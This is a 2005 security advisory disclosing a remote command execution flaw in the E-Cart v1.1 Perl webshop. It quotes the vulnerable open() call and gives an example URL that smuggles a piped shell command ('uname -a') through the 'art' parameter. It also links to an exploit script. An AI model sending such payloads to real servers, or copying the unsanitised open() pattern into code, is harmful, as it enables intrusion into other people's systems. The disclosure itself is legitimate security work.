============================================================ Title: E-Cart v1.1 Remote Command Execution Vulnerability discovery: SoulBlack - Security Research - http://soulblack.com.ar Date: 20/04/2005 Severity: High. Remote Users Can Execute Arbitrary Code. Affected version: <= E-Cart 2004 v1.1 Vendor: http://www.yazaport.com/kadfors/kwamd/mods/ecart/index.cgi ============================================================ ============================================================ *Summary E-Cart is a mod of WepApp written in Perl. It is WebShop. ============================================================ *Problem Description: The bug is in the file index.cgi where the variable art that is put under "open()", does not have a control of data, allowing to the attacker to execute any type of commands. Vulnerable code --------------- sub viewart { &cartfooter; open(DATA, "$catdir/$info{'cat'}/$info{'art'}"); hold(DATA); chomp(@data = ); release(DATA); close(DATA); ... ... ... ============================================================ *Example: http://SITE/DIRTOECART/index.cgi?action=viewart&cat=reproductores_dvd&art=reproductordvp-ns315.dat|uname%20-a| ============================================================ *Xpl: http://www.soulblack.com.ar/repo/tools/ecart-xpl.php ============================================================ *Fix: Contact the Vendor. ============================================================ -- SoulBlack - Security Research http://www.soulblack.com.ar